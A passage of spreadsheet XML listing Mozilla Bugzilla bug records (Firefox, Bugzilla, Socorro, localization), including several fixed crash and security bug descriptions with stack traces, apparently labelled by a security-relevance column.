          <t>Firefox ESR FAQ should mention the supported browser version of SaaS (Google Apps, Office 365, etc.)</t>
        </is>
      </c>
      <c r="D2941" t="inlineStr">
        <is>
          <t>2017-12-20 12:18:32 -0800</t>
        </is>
      </c>
      <c r="E2941" t="n">
        <v>1</v>
      </c>
      <c r="F2941" t="n">
        <v>1</v>
      </c>
      <c r="G2941" t="n">
        <v>5</v>
      </c>
      <c r="H2941" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2941" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2941" t="inlineStr">
        <is>
          <t>Pages &amp; Content</t>
        </is>
      </c>
      <c r="K2941" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2941" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2941" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2941" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2941" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2941" t="inlineStr"/>
      <c r="Q2941" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2941" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2941" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2941" t="n">
        <v>1</v>
      </c>
      <c r="U2941" t="n">
        <v>0</v>
      </c>
      <c r="V2941" t="n">
        <v>4</v>
      </c>
      <c r="W2941" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #732573 +++
The Office 365 System Requirements have been changed:
http://community.office365.com/en-us/f/148/t/44658.aspx
&gt; Firefox users should always use the latest production version
&gt; (known as the “Release” version).
Google Apps supported browsers:
http://googleenterprise.blogspot.jp/2011/06/our-plans-to-support-modern-browsers.html
&gt; We support the current and previous major releases of Firefox, 
&gt; Internet Explorer, and Safari on a rolling basis. Each time 
&gt; a new version is released, we begin supporting that version 
&gt; and stop supporting the third-oldest version.
In short, they don't support ESR. We should recommend the Release version for enterprise users who are using such SaaS, say
&gt; ESR is not supported by some SaaS like Google Apps and Office 365.
&gt; Please consult the system requirements of your services and choose
&gt; the latest Release version instead if required.</t>
        </is>
      </c>
      <c r="X2941" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2942">
      <c r="A2942" t="n">
        <v>251567</v>
      </c>
      <c r="B2942" t="inlineStr">
        <is>
          <t>2004-07-15 07:54:57 -0700</t>
        </is>
      </c>
      <c r="C2942" t="inlineStr">
        <is>
          <t>Find a specific bug misses too many obvious hits</t>
        </is>
      </c>
      <c r="D2942" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:40 -0800</t>
        </is>
      </c>
      <c r="E2942" t="n">
        <v>1</v>
      </c>
      <c r="F2942" t="n">
        <v>1</v>
      </c>
      <c r="G2942" t="n">
        <v>4</v>
      </c>
      <c r="H2942" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2942" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2942" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K2942" t="inlineStr">
        <is>
          <t>2.18</t>
        </is>
      </c>
      <c r="L2942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2942" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2942" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2942" t="inlineStr"/>
      <c r="Q2942" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2942" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2942" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T2942" t="n">
        <v>1</v>
      </c>
      <c r="U2942" t="n">
        <v>0</v>
      </c>
      <c r="V2942" t="n">
        <v>11</v>
      </c>
      <c r="W2942" t="inlineStr">
        <is>
          <t>Particularly on small sites, find a specific bug misses far too much.
I started with 10 bugs, one had "description" in a bug summary
I search for "description" and got zero.
Added "description bananna" to a comment on that bug.
Then, got 2 bugs for the same search.  The second one (less relevent) had no
mention of description anywhere.
find a specific bug should probably become ("content" "matches" whatever) OR
("summary" "contains" whatever)</t>
        </is>
      </c>
      <c r="X2942" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2943">
      <c r="A2943" t="n">
        <v>1442542</v>
      </c>
      <c r="B2943" t="inlineStr">
        <is>
          <t>2018-03-02 01:27:50 -0800</t>
        </is>
      </c>
      <c r="C2943" t="inlineStr">
        <is>
          <t>The options from Clear Data dialogue aren't selected and highlighted when navigating using Tab key</t>
        </is>
      </c>
      <c r="D2943" t="inlineStr">
        <is>
          <t>2018-05-17 02:12:10 -0700</t>
        </is>
      </c>
      <c r="E2943" t="n">
        <v>1</v>
      </c>
      <c r="F2943" t="n">
        <v>1</v>
      </c>
      <c r="G2943" t="n">
        <v>2</v>
      </c>
      <c r="H2943" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2943" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2943" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K2943" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L2943" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2943" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N2943" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2943" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2943" t="inlineStr">
        <is>
          <t>[storage-v2]</t>
        </is>
      </c>
      <c r="Q2943" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2943" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2943" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T2943" t="n">
        <v>1</v>
      </c>
      <c r="U2943" t="n">
        <v>0</v>
      </c>
      <c r="V2943" t="n">
        <v>24</v>
      </c>
      <c r="W2943" t="inlineStr">
        <is>
          <t>Created attachment 8955428
Untitled.png
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180301100139
[Affected versions]:
Nightly 60.0a1
[Affected platforms]:
Windows 7 x86, Windows 10 x64
[Steps to reproduce]:
1.Launch Nightly 60.0a1 with a new profile
2.Go to about:preferences#privacy and click "Clear Data" button from Cookies and Dite Data section
3.Press Tab key to navigate through Clear Data options ("Cookies and Site Data" and "Cached Web Content")
[Expected result]:
The options should be selected and highlighted
[Actual result]:
The options aren't selected and highlighted but a comma appear next to option checkbox</t>
        </is>
      </c>
      <c r="X2943" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2944">
      <c r="A2944" t="n">
        <v>648705</v>
      </c>
      <c r="B2944" t="inlineStr">
        <is>
          <t>2011-04-08 20:33:17 -0700</t>
        </is>
      </c>
      <c r="C2944" t="inlineStr">
        <is>
          <t>Possible security sensitive crash [@ mozilla::WebGLProgram::DetachShaders() ]</t>
        </is>
      </c>
      <c r="D2944" t="inlineStr">
        <is>
          <t>2011-07-12 08:24:30 -0700</t>
        </is>
      </c>
      <c r="E2944" t="n">
        <v>1</v>
      </c>
      <c r="F2944" t="n">
        <v>1</v>
      </c>
      <c r="G2944" t="n">
        <v>3</v>
      </c>
      <c r="H2944" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2944" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2944" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2944" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2944" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2944" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2944" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2944" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2944" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2944" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2944" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2944" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2944" t="n">
        <v>1</v>
      </c>
      <c r="U2944" t="n">
        <v>0</v>
      </c>
      <c r="V2944" t="n">
        <v>23</v>
      </c>
      <c r="W2944" t="inlineStr">
        <is>
          <t>When playing with possible infinite loop shaders I hit a crash that appears like it might be dangerous:
Crash Reason	EXCEPTION_ACCESS_VIOLATION_WRITE
Crash Address	0x253e70fc
0 	xul.dll 	mozilla::WebGLProgram::DetachShaders 	content/canvas/src/WebGLContext.h:1313
1 	xul.dll 	mozilla::WebGLContext::UseProgram 	content/canvas/src/WebGLContextGL.cpp:3573
2 	xul.dll 	nsIDOMWebGLRenderingContext_UseProgram 	obj-firefox/js/src/xpconnect/src/dom_quickstubs.cpp:31987
3 		@0x47ef8b 	
4 	mozjs.dll 	CheckStackAndEnterMethodJIT 	js/src/methodjit/MethodJIT.cpp:778
5 	mozjs.dll 	js::mjit::JaegerShot 	js/src/methodjit/MethodJIT.cpp:802
6 	mozjs.dll 	js::RunScript 	js/src/jsinterp.cpp:646
7 	mozjs.dll 	js::Invoke 	js/src/jsinterp.cpp:740
8 	mozjs.dll 	js::ExternalInvoke 	js/src/jsinterp.cpp:863
9 	mozjs.dll 	JS_CallFunctionValue 	js/src/jsapi.cpp:5173
10 	xul.dll 	nsJSContext::CallEventHandler 	dom/base/nsJSEnvironment.cpp:1914
11 	xul.dll 	nsGlobalWindow::RunTimeout 	dom/base/nsGlobalWindow.cpp:9107
12 	xul.dll 	nsGlobalWindow::TimerCallback 	dom/base/nsGlobalWindow.cpp:9452
13 	xul.dll 	nsTimerImpl::Fire 	xpcom/threads/nsTimerImpl.cpp:425
14 	xul.dll 	nsTimerEvent::Run 	xpcom/threads/nsTimerImpl.cpp:517
15 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:633
16 	xul.dll 	mozilla::ipc::MessagePump::Run 	ipc/glue/MessagePump.cpp:134
17 	xul.dll 	xul.dll@0xb367c7 	
18 	xul.dll 	MessageLoop::RunInternal 	ipc/chromium/src/base/message_loop.cc:219
19 	xul.dll 	MessageLoop::RunHandler 	ipc/chromium/src/base/message_loop.cc:202
20 	mozcrt19.dll 	_VEC_memzero 	
21 	xul.dll 	xul.dll@0x35d7cd 	
22 	firefox.exe 	firefox.exe@0x1bb7 	
23 	ntdll.dll 	WinSqmSetIfMaxDWORD 	
24 	ntdll.dll 	_RtlUserThreadStart 	
25 	firefox.exe 	firefox.exe@0x186f 	
26 	firefox.exe 	firefox.exe@0x186f 
1311 void DetachShaders() {
1312   for (PRUint32 i = 0; i &lt; mAttachedShaders.Length(); ++i) {
1313     mAttachedShaders[i]-&gt;DecrementAttachCount();
1314   }
1315   mAttachedShaders.Clear();
1316 }</t>
        </is>
      </c>
      <c r="X2944" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2945">
      <c r="A2945" t="n">
        <v>863935</v>
      </c>
      <c r="B2945" t="inlineStr">
        <is>
          <t>2013-04-19 17:27:40 -0700</t>
        </is>
      </c>
      <c r="C2945" t="inlineStr">
        <is>
          <t>Use-after-poison in nsFrameList::UnhookFrameFromSiblings with moz-column</t>
        </is>
      </c>
      <c r="D2945" t="inlineStr">
        <is>
          <t>2014-10-24 18:31:03 -0700</t>
        </is>
      </c>
      <c r="E2945" t="n">
        <v>1</v>
      </c>
      <c r="F2945" t="n">
        <v>1</v>
      </c>
      <c r="G2945" t="n">
        <v>3</v>
      </c>
      <c r="H2945" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2945" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2945" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K2945" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2945" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2945" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2945" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2945" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2945" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q2945" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2945" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2945" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2945" t="n">
        <v>1</v>
      </c>
      <c r="U2945" t="n">
        <v>0</v>
      </c>
      <c r="V2945" t="n">
        <v>19</v>
      </c>
      <c r="W2945" t="inlineStr">
        <is>
          <t>Created attachment 739896
testcase
Debug:
Assertion failure: !GetPropTableFrames(aPresContext, aProperty), at layout/generic/nsContainerFrame.cpp:1459
ASan:
Use-after-poison of pres arena memory in nsFrameList::UnhookFrameFromSiblings.
Nightly:
No symptoms.</t>
        </is>
      </c>
      <c r="X2945" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2946">
      <c r="A2946" t="n">
        <v>39531</v>
      </c>
      <c r="B2946" t="inlineStr">
        <is>
          <t>2000-05-16 17:22:10 -0700</t>
        </is>
      </c>
      <c r="C2946" t="inlineStr">
        <is>
          <t>showdependencytree.cgi doesn't check viewing permissions</t>
        </is>
      </c>
      <c r="D2946" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E2946" t="n">
        <v>1</v>
      </c>
      <c r="F2946" t="n">
        <v>1</v>
      </c>
      <c r="G2946" t="n">
        <v>4</v>
      </c>
      <c r="H2946" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2946" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2946" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2946" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2946" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2946" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N2946" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2946" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2946" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q2946" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2946" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2946" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T2946" t="n">
        <v>1</v>
      </c>
      <c r="U2946" t="n">
        <v>0</v>
      </c>
      <c r="V2946" t="n">
        <v>7</v>
      </c>
      <c r="W2946" t="inlineStr">
        <is>
          <t>http://bugzilla.mozilla.org/show_bug.cgi?id=28698 says "permission denied"
http://bugzilla.mozilla.org/showdependencytree.cgi?id=28698 doesn't, but 
instead tells me which bugs block and are blocked by the restricted bug.</t>
        </is>
      </c>
      <c r="X2946" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2947">
      <c r="A2947" t="n">
        <v>465651</v>
      </c>
      <c r="B2947" t="inlineStr">
        <is>
          <t>2008-11-18 19:13:25 -0800</t>
        </is>
      </c>
      <c r="C2947" t="inlineStr">
        <is>
          <t>Crash [@ nsFrameList::InsertFrame] with -moz-column and lots of floats</t>
        </is>
      </c>
      <c r="D2947" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2947" t="n">
        <v>1</v>
      </c>
      <c r="F2947" t="n">
        <v>1</v>
      </c>
      <c r="G2947" t="n">
        <v>3</v>
      </c>
      <c r="H2947" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2947" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2947" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2947" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2947" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2947" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2947" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2947" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2947" t="inlineStr">
        <is>
          <t>[sg:critical?][worked around by 191448 on 1.9.1/1.9.2]</t>
        </is>
      </c>
      <c r="Q2947" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2947" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2947" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2947" t="n">
        <v>1</v>
      </c>
      <c r="U2947" t="n">
        <v>0</v>
      </c>
      <c r="V2947" t="n">
        <v>45</v>
      </c>
      <c r="W2947" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: prev sibling has different parent: 'aNewFrame-&gt;GetParent() == aPrevSibling-&gt;GetParent()', file /Users/jruderman/central/layout/generic/nsFrameList.cpp, line 186
/Users/jruderman/central/obj-ff/dist/MinefieldDebug.app/Contents/MacOS/run-mozilla.sh: line 131:  1938 Segmentation fault      "$prog" ${1+"$@"}
Crash [@ nsFrameList::InsertFrame]</t>
        </is>
      </c>
      <c r="X2947" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2948">
      <c r="A2948" t="n">
        <v>1196751</v>
      </c>
      <c r="B2948" t="inlineStr">
        <is>
          <t>2015-08-20 07:50:54 -0700</t>
        </is>
      </c>
      <c r="C2948" t="inlineStr">
        <is>
          <t>Implementation instantiation gets overly cached</t>
        </is>
      </c>
      <c r="D2948" t="inlineStr">
        <is>
          <t>2015-09-01 14:58:16 -0700</t>
        </is>
      </c>
      <c r="E2948" t="n">
        <v>1</v>
      </c>
      <c r="F2948" t="n">
        <v>1</v>
      </c>
      <c r="G2948" t="n">
        <v>4</v>
      </c>
      <c r="H2948" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2948" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2948" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K2948" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2948" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2948" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2948" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2948" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2948" t="inlineStr"/>
      <c r="Q2948" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2948" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2948" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2948" t="n">
        <v>1</v>
      </c>
      <c r="U2948" t="n">
        <v>0</v>
      </c>
      <c r="V2948" t="n">
        <v>2</v>
      </c>
      <c r="W2948" t="inlineStr">
        <is>
          <t>In crashstats, each model (that uses it) defines an implementation class. This class gets instanciated only once (per python module import). This can cause some problems on certain implemenations if that instanciation does something important.</t>
        </is>
      </c>
      <c r="X2948" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2949">
      <c r="A2949" t="n">
        <v>379959</v>
      </c>
      <c r="B2949" t="inlineStr">
        <is>
          <t>2007-05-07 09:30:47 -0700</t>
        </is>
      </c>
      <c r="C2949" t="inlineStr">
        <is>
          <t>loadBindingDocument doesn't do any security checks</t>
        </is>
      </c>
      <c r="D2949" t="inlineStr">
        <is>
          <t>2015-02-23 17:58:32 -0800</t>
        </is>
      </c>
      <c r="E2949" t="n">
        <v>1</v>
      </c>
      <c r="F2949" t="n">
        <v>1</v>
      </c>
      <c r="G2949" t="n">
        <v>3</v>
      </c>
      <c r="H2949" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2949" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2949" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K2949" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2949" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2949" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2949" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2949" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2949" t="inlineStr">
        <is>
          <t>[sg:high] high assuming you can read arbitrary XML</t>
        </is>
      </c>
      <c r="Q2949" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2949" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2949" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2949" t="n">
        <v>1</v>
      </c>
      <c r="U2949" t="n">
        <v>0</v>
      </c>
      <c r="V2949" t="n">
        <v>94</v>
      </c>
      <c r="W2949" t="inlineStr">
        <is>
          <t>In fact, the only check it does is that the scheme of the document loadBindingDocument is called on matches the scheme of the document it's going to hand back.  If they don't match, it hands back null.
Consequences:
1)  Web sites can use this method to load data from file:// (though they can't read it).  This includes things like /dev/stdin, etc...
2)  Web sites can use this to load XBL from other sites and get access to the full DOM of the binding document.  The XML _does_ need to contain a &lt;bindings&gt; tag in the XBL namespace, so it's not quite as bad as allowing arbitrary XML fetches, but still pretty bad.
Ideally we would do the following checks here:
A)  CheckLoadURI.
B)  Content policy check.
C)  Same-origin check against URI to load.
D)  Same-origin check on redirects.
Basically, whatever XMLHttpRequest does...
I really wish we didn't hand back the document here.  I can't really see a use case for it, and we wouldn't need checks C and D above, probably, if all we did was to load the document somewhere internally.  Maybe that's the way to go?</t>
        </is>
      </c>
      <c r="X2949" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2950">
      <c r="A2950" t="n">
        <v>173278</v>
      </c>
      <c r="B2950" t="inlineStr">
        <is>
          <t>2002-10-08 08:53:41 -0700</t>
        </is>
      </c>
      <c r="C2950" t="inlineStr">
        <is>
          <t>Should not prefetch &lt;link rel="alternate"&gt;</t>
        </is>
      </c>
      <c r="D2950" t="inlineStr">
        <is>
          <t>2002-10-14 15:01:45 -0700</t>
        </is>
      </c>
      <c r="E2950" t="n">
        <v>1</v>
      </c>
      <c r="F2950" t="n">
        <v>1</v>
      </c>
      <c r="G2950" t="n">
        <v>3</v>
      </c>
      <c r="H2950" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2950" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2950" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2950" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2950" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2950" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N2950" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2950" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2950" t="inlineStr"/>
      <c r="Q2950" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2950" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2950" t="inlineStr">
        <is>
          <t>mozilla1.2beta</t>
        </is>
      </c>
      <c r="T2950" t="n">
        <v>1</v>
      </c>
      <c r="U2950" t="n">
        <v>0</v>
      </c>
      <c r="V2950" t="n">
        <v>9</v>
      </c>
      <c r="W2950" t="inlineStr">
        <is>
          <t>&lt;link rel="alternate" ...&gt; is used to provide alternate versions (for different
media types, devices, languages, etc.) of the same document.  Currently (Win2K
build 2002100804) the &lt;link&gt; prefetching (bug 12274) prefetches these
alternates.  There is no reason to prefetch multiple versions of the same
document; there is little chance the user will visit these alternate pages, and
it increases server load significantly.</t>
        </is>
      </c>
      <c r="X2950" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2951">
      <c r="A2951" t="n">
        <v>885309</v>
      </c>
      <c r="B2951" t="inlineStr">
        <is>
          <t>2013-06-20 06:08:26 -0700</t>
        </is>
      </c>
      <c r="C2951" t="inlineStr">
        <is>
          <t>Duplicate questions in the search index</t>
        </is>
      </c>
      <c r="D2951" t="inlineStr">
        <is>
          <t>2013-07-01 16:22:32 -0700</t>
        </is>
      </c>
      <c r="E2951" t="n">
        <v>1</v>
      </c>
      <c r="F2951" t="n">
        <v>1</v>
      </c>
      <c r="G2951" t="n">
        <v>5</v>
      </c>
      <c r="H2951" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2951" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2951" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K2951" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2951" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2951" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2951" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2951" t="inlineStr">
        <is>
          <t>u=user c=search p=2 s=2013.13</t>
        </is>
      </c>
      <c r="Q2951" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2951" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2951" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T2951" t="n">
        <v>1</v>
      </c>
      <c r="U2951" t="n">
        <v>0</v>
      </c>
      <c r="V2951" t="n">
        <v>8</v>
      </c>
      <c r="W2951" t="inlineStr">
        <is>
          <t>Something is causing questions to appear in the index multiple times.
See:
https://support.mozilla.org/en-US/forums/contributors/709276
An example is:
https://support.mozilla.org/search?q=&amp;asked_by=dick888&amp;answered_by=&amp;w=2&amp;a=1&amp;sortby=1
Although, that might go away as soon as we reindex.</t>
        </is>
      </c>
      <c r="X2951" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2952">
      <c r="A2952" t="n">
        <v>906563</v>
      </c>
      <c r="B2952" t="inlineStr">
        <is>
          <t>2013-08-18 21:58:05 -0700</t>
        </is>
      </c>
      <c r="C2952" t="inlineStr">
        <is>
          <t>[b2g][l10n][marketing][hu]: l10n of masterfirefoxos.com for 1.1 release</t>
        </is>
      </c>
      <c r="D2952" t="inlineStr">
        <is>
          <t>2014-01-29 14:10:20 -0800</t>
        </is>
      </c>
      <c r="E2952" t="n">
        <v>1</v>
      </c>
      <c r="F2952" t="n">
        <v>1</v>
      </c>
      <c r="G2952" t="n">
        <v>2</v>
      </c>
      <c r="H2952" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2952" t="inlineStr">
        <is>
          <t>Mozilla Localizations</t>
        </is>
      </c>
      <c r="J2952" t="inlineStr">
        <is>
          <t>hu / Hungarian</t>
        </is>
      </c>
      <c r="K2952" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2952" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2952" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N2952" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2952" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2952" t="inlineStr"/>
      <c r="Q2952" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2952" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2952" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2952" t="n">
        <v>1</v>
      </c>
      <c r="U2952" t="n">
        <v>0</v>
      </c>
      <c r="V2952" t="n">
        <v>35</v>
      </c>
      <c r="W2952" t="inlineStr">
        <is>
          <t>Created attachment 791997
kus13009_Script_Translation_Master-template-Wave2.doc
